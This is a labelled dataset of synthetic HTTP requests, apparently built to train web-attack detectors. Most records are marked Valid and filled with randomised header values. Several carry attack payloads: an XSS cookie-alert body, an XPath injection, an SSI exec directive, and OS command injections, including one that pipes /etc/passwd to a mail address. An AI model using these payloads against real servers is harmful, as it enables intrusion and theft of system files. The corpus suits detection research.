From: vconid@sswn.net
If-Modified-Since: Sat, 27 Jun 09 09:03:14 UTC
If-Unmodified-Since: Fri, 25 Dec 09 20:43:13 UTC
If-Match: *
If-None-Match: *
If-Range: "ddHbZIbO71Uw0tEHzCS"
Max-Forwards: 153
MIME-Version: 5.4
Pragma: sTi=o4mleae
Proxy-Authorization: NTLM dXV2bW9PMmVlZXM1ZWVvaHhocmhld0x0blRpbXZibGpjcnQ=
Authorization: NTLM bGlTY2V1c21hYWVuYmFocHRuaW11aW5yRDJsakRkenJ0Mw==
Range: -723,550-
Referer: http://ater.uk/5tyxveis/1tt5e7cr/2Pse/dEoweank/7anhpmt.html
TE: trailers,gzip
Trailer: Via
User-Agent: reeodUeo/7.6
UA-CPU: StrongARM
UA-Disp: 887,1676,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6978x463
Via: FTP/4.7 125.11.53.215:881, 9.2 57.82.120.87:7516, HTTP/1.6 246.140.161.212
Transfer-Encoding: identity
Upgrade: wptde/7.7, 5sb/8.6
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31420
Start - Id: 10633
class: Valid
GET /qs.gif? HTTP/1.1
Host: 36.153.80.66
Connection: naeeean
Accept: */*;q=0.2
Accept-Charset: windows-1255;q=0.8, x-mac-arabic;q=0.3, iso-8859-1, windows-1255, iso-8859-1
Accept-Encoding: 
Accept-Language: Hnas-gb;q=0.9, tt-i;q=0.7, aWeMO-n;q=0.4
Cache-Control: max-stale
Client-ip: 50.232.25.8
Cookie: tfoe7shnuu=inhtaccesoo;siaghntgeH5so=Oeewih;gheamtRmrnotoaR=papoTno
Cookie2: $Version="30"
Date: Thu, 08 May 08 02:03:09 GMT
ETag: "mkMoih0Lj3Gj6SphZ"
Expect: 100-continue
From: 2a5l@oierufMLhr.com
If-Modified-Since: Thu, 25 Dec 08 23:56:17 CET
If-Unmodified-Since: Thu, 26 Nov 09 13:22:10 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Dec 04 23:29:32 UTC
Max-Forwards: 854
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest response="FcF6f5Fc9A37e66cB49eaBB5B16af622"
Authorization: Digest qop=auth
Range: 6-0447,7686-38299,7705-
Referer: http://ktGw.it/ieLyyA/cbdaaHr/gyuno.htm
TE: deflate,trailers,chunked
Trailer: Via
User-Agent: ptrqmsst7
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7494x790
Via: 3.4 www.bEhc.shtml
Transfer-Encoding: identity
Upgrade: telnx/9.9, iusnr/3.5
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10633
Start - Id: 30657
class: Valid
GET /.asC/nhe7dx.Tcb6BZqaH05e/uQcopyFXL3/aDuG48USW/jNacceptL2hfCpRP-Z/lJRNe-F8YAXg9r2Dg5UX/VWHtLp1/mzsnbbVtretmtiho/nl1nmtt/nchUSqAq3.xUhw/fa.dll?l_YxSFtmp5avs=style%5C0%5C4has&ycfnabeii3=ivtzI&4q8eiapsb=3619&7a4fthueUtiildR=ix_BY.G&9SyhoptR_I=Ttehfepswgetpq6bng&script5GQN=o7iui4sa&oe0piafhiu=hTe&dbkuHlrintstrh9=w%7E&JtxPS=6312734&s7otDnbiN9iwN=54&nryi7p6op4cx1=iCZ9_&rol=pTuA0y%40H&hxihtUe=6eurecuse7omoDNoLe&7dnoe=ovmor&Iv9YZKP.VQhI=samailc HTTP/1.1
Host: 40.124.6.187
Connection: close
Accept: audio/x-wav, image/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 67.66.20.239
Cookie: odire0ona=sBBZ;T5igGaY4ragxaor=iao aaO/
Cookie2: $Version="79"
Date: Fri, 11 May 07 06:16:20 GMT
ETag: "hU2jxW9l_8kAduKYw0te"
Expect: 100-continue
From: ceAnse@0hhlitFdht.fr
If-Modified-Since: Thu, 15 Oct 09 20:22:35 UTC
If-Unmodified-Since: Sat, 01 Aug 09 09:13:37 UTC
If-Match: *
If-None-Match: "1XffFgOB1IwuNND"
If-Range: Fri, 27 Apr 07 13:04:56 UTC
Max-Forwards: 444
MIME-Version: 8.0
Pragma: yu5=nnt
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: 41Srw0 9ewK=3r14p7
Range: 0-,163-,68-6
Referer: http://too88.be/airi/sontwe0/o7iscri.gif
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.6 (Windows; U; Win98 6.8; rt-pe; rv:8.3.8) Gecko/83125443
UA-CPU: MIPS
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: compress
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 047 www.Vcie.gif:267 "ksqsddinwgeeW" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 472936518137
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30657
Start - Id: 46790
class: XSS
POST /cRH@6-/ycXwdaNEwOaNRth4E4/qi-ruCE6Qm/tgq@Oh/i9BSl5q64fE0sGS/8Vc1-z0UeZS.shtml? HTTP/1.0
Content-Length: 259
Content-Language: n
Content-Encoding: gzip
Content-Location: /iadxnm/eapct4a/I5aro.cgi
Content-MD5: MnNoc2V2c3N6cmNyeWV2dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Nov 04 21:03:05 GMT
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: www.infqtatedN.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: whh2eyo-idge
Cache-Control: no-cache
Client-ip: 160.46.236.124
Cookie: lywtVen=8
Cookie2: $Version="461"
Date: Tue, 18 Sep 07 17:24:08 CET
ETag: W/"w6tFK0pcm3oEf.Rt"
Expect: lod7usoh=lnesn;fciWrk=a2t2e2vr
From: fnwte@lpuewgs.de
If-Modified-Since: Sat, 01 Apr 06 10:49:33 CET
If-Unmodified-Since: Mon, 31 Mar 08 23:58:29 GMT
If-Match: *
If-None-Match: "G0nTqeQa6KTAgBc.8"
If-Range: "oMiSPy4UkejBMD1Ydkw5"
Max-Forwards: 80
MIME-Version: 5.1
Pragma: iodee2i='5sh'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: Digest qop=auth
Range: 833-
Referer: /niuva.tiff
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: bdbngt/9.4.2.5
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 90.168.251.169
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a0Rqe5ru=a+hc50e&wBkqqGd6UPeX=/anphpnttconnectcispiaeda&strmghaW=:ws0osrhceaFitd rbEe&3ulities8sm=do7"      ><body%20onload=alert   (document.cookie); >&pcCe=005267&shie=VaD0u5foiesaspepuV&hjk3d=htcc7ee&Sna=47&hlnnm2e=uiUymaea7M8styaeu

End - Id: 46790
Start - Id: 34274
class: Valid
POST /Z7X./U3a4RomF9/rtmftdmeip3ki/lPItbGhx@NYm-3/oahi2itole4nhte/oihimNrpdhwonlspd7ot/KYU3location83/9adminA.rD5Zlib/1o/jycsii7mrAnUj4m0ekey/nhJHWDdocumentbinbgsoundApassthrul8Y.jpeg? HTTP/1.0
Content-Length: 159
Content-Language: nrD,za
Content-Encoding: compress
Content-Location: http://www.tcdbeptr.fr/0aey6sb/nuosi.js
Content-MD5: MHBsbnJqcnVlaGUwY0xpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Dec 07 17:09:37 UTC
Last-Modified: Wed, 20 Aug 08 02:05:29 GMT
Host: www.grAa.gov
Connection: mtopiit
Accept: text/*;q=0.6, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 89.182.100.174
Cookie: epdeo67bthgr=itt;aS7xo=ueibrvt3i1rae3nsdk;oahn4ehasc=0;bnSt1mqHettyueh=ltsoaducedf0oeVr;vdwie=t:7re7&oth7cij
Cookie2: $Version="236"
Date: Mon, 19 Apr 10 12:12:26 GMT
ETag: W/"pmTNHPYgCSciJwXH"
Expect: 100-continue
From: 4ytj@b9euc4sM.it
If-Modified-Since: Fri, 17 Oct 08 22:41:15 CET
If-Unmodified-Since: Fri, 17 Jul 09 14:03:07 GMT
If-Match: "INAcVBYM-01QWM6q"
If-None-Match: *
If-Range: Fri, 22 May 09 11:14:00 CET
Max-Forwards: 1
MIME-Version: 6.1
Pragma: ezP=chesmi
Proxy-Authorization: NTLM c2k3QXN0dHNVa2FhM3hhZWlydGhjb3FOZWl1c2JjbmFp
Authorization: Rlhwo9 iANp=iabt
Range: -0,7377-6
Referer: http://9eSPz.net/ndnkn/p9ecnne/tmiaeioe/bwse9ds.pdf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.0 (X11; U; SunOS sun4u 5.7; ts-rm; rv:5.2.9) Gecko/17691601
UA-CPU: 68000
UA-Disp: 693,674,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1417x508
Via: 8.7 18.107.221.114, 3.7 www.g8cgwn.html
Transfer-Encoding: deflate
Upgrade: ler/8.6, adth/8.2, itt/7.5
Warning: 445 www.dRtgo.jpeg "eeTzgb" 
X-Forwarded-For: 60.98.250.76
X-Serial-Number: 437295181628210
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hne2r8so6iliCs=cszri7tA&tinl=neA&nIR=o&ay2=84&naEse=n(a&D5&tsnaaPFz=rheullumern&cEs=ithoGeeneiReei&wgeuev=dxYC&laEsr9s=moas&sam-4uscript7Zk=nodese|]lwi

End - Id: 34274
Start - Id: 35758
class: XPathInjection
GET /d4YE6zEaYMnrK/0nMlaKv/s8/e5r2nsclyndo/htacces5Isock_streamOimg6Sa59/hv/tot.Jl303PsGW2yk/DAIoq0dewt6meUj/n5HRaVGDK/3dclder7iDamanisoM.dll?nsvtgkeedtonkc=ed_ZRWkUuSa&euhtxxsrbni=exp_&detgToAotU=wwp&relrdnrlcqsc=88+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++5878%3D&dfodcsjatOnv=a5iwcrselectMre%3F&OjCvcsr8cce=tFJ3zhDycc&gGps=yNel&fbianiavre=0lmhe&rei5=8493660170 HTTP/1.0
Host: 227.86.38.81:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rit-t, o-ewo;q=0.7, aU-c;q=0.4
Cache-Control: no-transform
Client-ip: 54.55.177.74
Cookie: aFi05MO=32558482;a1rrw=dfv1q;hershke=gafh3dwajss;ig=m-BNp@2vp.wg;.WwOFjT=lFXZ2lamn;a5asesdiwoNos= p
Cookie2: $Version="034"
Date: Fri, 23 Apr 04 24:02:34 CET
ETag: W/"tx4rnnmX2sb3QcSIRCH"
Expect: 100-continue
From: htrqsr@alp77rurTt.com
If-Modified-Since: Fri, 11 Dec 09 24:02:15 CET
If-Unmodified-Since: Fri, 23 Jan 04 24:41:09 GMT
If-Match: "e3lBnh-n3ugMe-a--bP"
If-None-Match: "Ie1-XHSQv.5nL4m"
If-Range: Sun, 31 Jan 10 03:35:40 UTC
Max-Forwards: 7399
MIME-Version: 3.7
Pragma: s='rihp'
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: Digest response="FdAeBB2515BdE70383bDEce8cbCeBd9B"
Range: 9042-41
Referer: /yn6nhu/Tnuw/teEhndo/Entruj/eklaT.js
TE: gzip;q=0.9
Trailer: Connection
User-Agent: Mozilla/9.2 (X11; U; Open BSD i386 8.3; e8-aq; rv:7.6.1) Gecko/45085864
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6100x360
Via: 9.9 www.acuneet.htm, fLue/7.9 122.43.133.37
Transfer-Encoding: compress
Upgrade: inuOi/4.6, b70ue/5.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35758
Start - Id: 10898
class: Valid
GET /baswopaNaztthxjak/st0axnt9Zznydryici7/upassthruWAWZt-netcathtacceso4pW/tc_/4S/e-__ieB/sn/nVaS81PZ/xmlq-e@LZC@.php3?w_e7M=oHhheboglitnas&qao=fd7&wioakxs=2417&sey=+oiframetS+sy&ilnkenhGAronR=uwo09e%7E HTTP/1.0
Host: www.CgstyiFe.ch:80
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: aes-emiltti;q=0.7, sws-h2brmr9;q=0.0, eishb-eee2s4f, Vl3vwre-sIs5i;q=0.3
Cache-Control: max-stale
Client-ip: 154.30.238.254
Cookie: i--Bu=oRT;hneOtrPra=caoensnemrarsee2l;imgX42IT=07;R0aoaieirdi=1e=so;nsfArw1=qsocopyhegk ;rtPulhbeiinnea=>hiselectamechodsmail3e (hVrtelnet1b
Cookie2: $Version="5"
Date: Tue, 06 Dec 05 09:25:59 GMT
ETag: W/"6Mh1-AoRzB7HsMp"
Expect: krhw
From: heIkpobr@raCkou.it
If-Modified-Since: Sun, 26 Mar 06 01:33:27 CET
If-Unmodified-Since: Wed, 10 Nov 04 22:41:10 UTC
If-Match: *
If-None-Match: "rLw3qVp-yMchOKIB@Gq"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: atsuIo ssTe=rsipu
Authorization: Basic VG50b2FjOmdoYWg=
Range: 766-1
Referer: /uhflpeet.nsf
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: 3oeibyina (ordJ_J7)
UA-CPU: PowerPC
UA-Disp: 2674,4710,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 488x175
Via: amom/0.5 www.tiam.js, 1.6 21.20.105.86, FTP/6.3 190.106.194.206
Transfer-Encoding: gzip
Upgrade: zitfn/8.6, ijcqg/4.3
Warning: 301 www.ebkTeia.jpeg "cruweuettgs" 
X-Forwarded-For: 250.170.187.7
X-Serial-Number: 70193457062638076597
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10898
Start - Id: 17504
class: Valid
GET /n6u_GDZnbzE-N4NPP/ueCcuse7ys/Uo1I3/6vPewk5vhttpLR-/PLQNnetcat.js?eahkb60ryw=c%7Cfs&gvorLs6aeem=rY1qv.a%40a&6-scriptnB=lh6aon&weAaUri=ency&aeZqiH=nse1s%28&b41haTttah=357537&oaa5sf=vimrncotcmxn3nnaoe&easEea3Tdzthl=8&qf0s=u3oDH1yjmidw&tots67keTtsrtd=nttsqi&ahdeCwnseZnie1n=tft&mztreh=688&ap0i2paayhemsb=umoerf9deletey5%26&a8be=m3xsr5pa6lp4eaei HTTP/1.1
Host: 22.106.221.200
Connection: aeTttBk
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.7, deflate;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-age=8
Client-ip: 252.240.14.144
Cookie: 2@HmetavMWvDt=198062621
Cookie2: $Version="132"
Date: Thu, 01 Jan 09 10:02:58 CET
ETag: "VfDQeglA-OWCeNU4sa"
Expect: 100-continue
From: roosohie@ineaersa7.com
If-Modified-Since: Sat, 21 Nov 09 20:24:50 UTC
If-Unmodified-Since: Mon, 07 Dec 09 13:32:50 GMT
If-Match: "NoolCNKpbtZMnZzRv"
If-None-Match: "PQqaRZVRhdpYTPBc7"
If-Range: *
Max-Forwards: 70
MIME-Version: 5.7
Pragma: 0='joi'
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest cnonce="r5y8"
Range: 6-05,-0890
Referer: http://www.T7sc.de/pEthok6h.gif
TE: trailers
Trailer: Proxy-Authorization
User-Agent: 00elsiad/1.6.8.5.6
UA-CPU: x86
UA-Disp: 646,6617,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6336x8003
Via: jsnsse/0.9 115.56.77.126
Transfer-Encoding: identity
Upgrade: wys/9.8, dwn/4.4
Warning: 717 www.sihute.js:411 "rxtlf8maScstprd2" "Mon, 15 Feb 10 02:09:14 CET"
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17504
Start - Id: 21382
class: Valid
GET /pdIqfO7WEMP7XyZ6S.png?ce2ltovlnN2yst=gueilink&o5a=3object&he1nt=53&ibeht=muavHxperlhn&otesrcmr72=0&hreesiuaao=Ial9ns4anbnhx&i9sgolsa4=rtTpnode3%27bnEqsE&Dambttss=80723&ie=t%2Bu&Tab=aeddtrd+eisu%5B&toSmd=%24+nat%3Cm%28+c+iservicesr%3E+&n4IhahpEyO=s HTTP/1.1
Host: 163.248.55.105:1182
Connection: keep-alive
Accept: text/*;q=0.6, audio/basic;q=0.6, audio/basic
Accept-Charset: iso-8859-6
Accept-Encoding: deflate, identity;q=0.9, gzip;q=0.4
Accept-Language: ddrurSm-ilNvn08;q=0.7, FiVae-0lriAan, eincn-NegeHoai
Cache-Control: no-store
Client-ip: 129.180.163.192
Cookie: 5Tjmt=109;iL8v1e3=dsu8a
Cookie2: $Version="2"
Date: Sun, 22 May 05 09:40:51 GMT
ETag: "NH-4d06ZBYMuVX6"
Expect: 100-continue
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Wed, 31 Oct 07 13:39:09 UTC
If-Unmodified-Since: Tue, 10 Nov 09 21:44:19 CET
If-Match: *
If-None-Match: "Rjw.MeQVzIEQ@ZFD"
If-Range: Wed, 28 Sep 05 22:49:45 UTC
Max-Forwards: 4566
MIME-Version: 7.5
Pragma: usn='sifr'
Proxy-Authorization: Digest opaque="feou"
Authorization: lbqPj 8buhc=p6raoder
Range: -5
Referer: http://tsetehdx.ch/cntt/fesrm.sh
TE: chunked;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/5.5 (compatible; ahfroiteec; Linux i586; iOeduG)
UA-CPU: Sparc
UA-Disp: 0248,8478,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 965x768
Via: 1.8 www.dAshaejg.htm:40623
Transfer-Encoding: identity
Upgrade: onvsi/6.1, khwk5/6.0, rtwSo/2.4, aub9tl/1.3, ascUa1/1.5
Warning: 043 24.229.27.123 "ortNea7pt" 
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 21382
Start - Id: 3165
class: Valid
GET /LRscript7positionlibWx.zt3/i9BBimwy5qW-hdZF7@/WFPORK/nehwl0bihg/9rPVObZPs/dt/roLosora/hagrh2e/sgnc/zfaapnDnrsToKeUtdi/nqYl.shtml?rcaatoi=1itavaeinluP&esqdelnbzipsOS=8037&t7uEe5neive=tlocation8-&aieetreleehntI=w_oC7F4W3&trdanw2udhrt=2&an52alct=oF&Wtteu=homessb2m%28tl0oj%25cnxn%29I&soeda=t%2F HTTP/1.1
Host: 132.121.122.202
Connection: close
Accept: application/postscript, video/mpeg, application/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 1esEskeg-srdGcua;q=0.8, paujAd-glh, pbr-eEaret, Rgih-liiLpm, tro-pilsu;q=0.8
Cache-Control: min-fresh=1
Client-ip: 71.148.219.49
Cookie: chRe=005480
Cookie2: $Version="3"
Date: Wed, 30 Jan 08 09:25:52 CET
ETag: W/"qpb11yYt1pA8oRzNH"
Expect: 100-continue
From: wjusl@qq7daennmf.uk
If-Modified-Since: Sun, 25 Jan 04 12:16:43 UTC
If-Unmodified-Since: Fri, 24 Nov 06 13:56:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 May 04 18:42:01 GMT
Max-Forwards: 1088
MIME-Version: 4.0
Pragma: ist9=yioteseg
Proxy-Authorization: Basic OHRyZTpUZWttd3N0ZQ==
Authorization: Digest response="242C60cEaAedBfce2CA43FAB1eF3f9ca"
Range: -47302,-8,36738-
Referer: /tdln.exe
TE: trailers,gzip
Trailer: Authorization
User-Agent: Lnxtgdkt/2.4.5.6.9
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5717x5114
Via: 6.1 www.Nea07in.jpeg:98464, 6.4 173.114.104.38
Transfer-Encoding: gzip
Upgrade: ianerr/8.5
Warning: 132 www.nTshc.jpg "Fieyiaatdeh" 
X-Forwarded-For: 227.104.147.72
X-Serial-Number: 37153368506514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3165
Start - Id: 43441
class: OsCommanding
GET /eSireeishTroHcr2ob/r0M/divS4netcatVEbI1qAAspassthrum/m.wH/uv4aBE_NQiQJNb4/tn6.66@QgqKnVPJ/iTqgibdsjavemihui.asp?ea=92201&Dk3Qnrp415Is=oops%3B++cat+++++%2Fetc%2Fpasswd+++++%7Cmail++your%40ta.com&siVd6C=n+s5l&dsz66=+Ewboot.inin83tsanhnim HTTP/1.1
Host: 31.116.112.91:80
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: min-fresh=0
Client-ip: 87.24.160.134
Cookie: ewn=we;26edjmS=57692;ur8neiaeiodtzw=rformhg 8lebt9aiym
Cookie2: $Version="848"
Date: Sat, 05 Apr 08 12:53:35 GMT
ETag: W/"J3rodTGe@9EySOL0.e"
Expect: a9incnt
From: cdtlidt@uc5ldntS6.ch
If-Modified-Since: Sun, 26 Mar 06 05:07:19 CET
If-Unmodified-Since: Mon, 12 Jul 04 03:12:43 CET
If-Match: *
If-None-Match: "sBQlHJT-mIt71oC"
If-Range: Tue, 12 Jan 10 21:20:43 CET
Max-Forwards: 2929
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/7hmcto/mcseerrc.css
Authorization: VPri otoheooh=enai
Range: -0418,311-
Referer: http://www.weirm.be/uaDno/nsak.jsp
TE: chunked,deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 2.2; 6s-at; rv:4.5.4) Gecko/90966243
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: 1.3 www.rzt5j.css:0185, 0.5 121.254.86.178, 4.8 www.aoe7uh.js
Transfer-Encoding: rwc8tN
Upgrade: ewhEb/3.3, ireLoh/3.0, nint/5.1, 2e6/5.0, hEnl6/3.5
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43441
Start - Id: 44561
class: OsCommanding
GET /tcaot3NhoAu5rds/zoN4nj5ey/lsrmAZi2157Uf5g5/aieeicth/XhtaccesL/6Y/_-TUKXWy/mepK/iVdS-kl/6V/ecaDutls.png?vizNeimuuiHze=5554914620&ufy9TtymmStoelh=9896780&fi=nY9%40Gdz&sBxrbedr9h=juAsaU&uaBoG1ltsante=yiAIkrIuasyltde&4includetQ=b%240var%3E%27Ohonswindow.openaGra&HdbEQ4jpLW=d0&iyeox08ayett=Iee5reanNy1rtqwlm&ehn=8597646&WxHzpoadwe3h0o2=rsmettngdn9tt&4ur=dODS-YI7as&Pdcme7r5IccrAso=nVLjjD6nhf9&aR8sa=%25oqe&UeorhA=096&Eo-Zposition=3289099 HTTP/1.0
Host: 209.33.49.4
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress, identity, identity, identity, identity;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-stale=5
Cookie: fqdtin7beovkcdu=49547;yncfiefat7k=190.7.118.116 |  echo "test" >evilfile.txt;rcoh7pyAeh=eval3 ba;W2pgGLf=i-?
Cookie2: $Version="160"
Date: Sat, 31 Jan 09 24:38:52 CET
If-Modified-Since: Tue, 15 Sep 09 05:02:41 UTC
If-Unmodified-Since: Thu, 14 Apr 05 01:23:22 UTC
If-Match: *
If-Range: Wed, 23 Aug 06 04:14:02 UTC
Max-Forwards: 7866
MIME-Version: 1.6
Proxy-Authorization: Digest cnonce="aktaiE"
Referer: http://www.1eeeuyaT.org/nethpqe/lao8t.txt
User-Agent: tt8trwreeb/2.5.7.4.1
Via: FTP/9.6 61.125.76.15
Warning: 061 239.241.240.236 "rLtasiuxrass" 
----: ---------------------------------------

null

End - Id: 44561
Start - Id: 39495
class: SSI
POST /d3/iHe9-/iC4SXNukZG0l0q49F/euh/anoOedhdd.shtml? HTTP/1.1
Content-Length: 32
Content-Language: iat,lwgi,e2a5x
Content-Encoding: gzip
Content-Location: /ennwr.cgi
Content-MD5: Y2dpZWdud2Vha3VpbHBmaw==
Content-Type: application/x-www-form-urlencoded
Host: www.7aaiqN.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, iso-8859-5, euc-jp, x-mac-arabic, euc-kr
Accept-Encoding: gzip, deflate, gzip, deflate;q=0.9, identity;q=0.2
Cookie: 69oohacesoto=<!--#exec     cgi="/cgi-bin/script?abniiant0d"    -->;to8adqrro3r0re=;4os;siothnhtsd=tOrhia6Tetechovbscripthaiotxp_r(
Date: Tue, 26 Sep 06 10:22:53 UTC
ETag: W/"Di4nOHdU5Q4FieGUf"
Expect: mzsuaeht
If-Unmodified-Since: Sat, 06 Oct 07 04:35:45 CET
If-None-Match: "9okBhzODpApQKsX"
Max-Forwards: 3169
Pragma: no-cache
Referer: /sEl4tn/82iOpiut/yeahhete/kkon/aepdr.jsp
User-Agent: Mozilla/5.3 (compatible; Konqueror/9.3; WinNT; dhnTns; kohia7drui)
UA-CPU: MIPS
Transfer-Encoding: identity

i8= sr o&_5CMb=et5yrcppennuluu n

End - Id: 39495
Start - Id: 30060
class: Valid
GET /lGca5vSrSUvRpVGB/ooanRyaMo4ydio/iBpDCbcnkWVox27X-p/mGw@oCiframe@window.openlocation/soleFwsisaeisnRtnia/ebcsoIoliuoxnnsan/qcnsiiogrlv4/ElibfFcopy.html?ntsEh=mintsrliked+aad%27 HTTP/1.0
Host: www.rb5vaie.gov:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: gb2312
Accept-Encoding: compress, deflate;q=0.4, compress;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 21.39.235.102
Cookie: qsiaNc8Unssb=Eleyltne7otilfrompechos5<
Cookie2: $Version="16"
Date: Thu, 24 Jun 04 06:12:50 CET
ETag: "X4X3wSkRbcqHJDFv7fQ"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Mon, 11 Jan 10 14:20:30 GMT
If-Unmodified-Since: Fri, 03 Oct 08 11:15:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.9
Pragma: eydrc=snvead
Proxy-Authorization: hh5ore wukONet=mohs
Authorization: NTLM c3R0aGhucHN5ZUczYXJoY3I2Tmw5MW9yb3JvcnRvc2RUaW90
Range: 801-,-797
Referer: /rhsdag/DgOes/3rcpa/hhcu/axlc.cgi
TE: trailers,gzip
Trailer: Referer
User-Agent: Mozilla/4.1 (Windows; U; WinNT 7.8; i1-ci; rv:9.6.5) Gecko/77959478
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8553x7465
Via: t00Fs/8.7 www.M0uTld.htm, 2.8 255.89.169.43, FTP/4.3 www.iNyt.html:9
Transfer-Encoding: gzip
Upgrade: batwt/6.7
Warning: 496 239.40.26.43 "thgzpmOrfs4aeg" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 418347308
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 30060
Start - Id: 3139
class: Valid
GET /lywdli/ah/os/detsPe3ac/iBWsdB1ppF-MZYc/b5n5leeoaaeT6egi.js?tmes=uclAtSa%40mG&euEmdagsmee=s HTTP/1.1
Host: 245.221.218.80
Connection: ehtem
Accept: */*;q=0.3
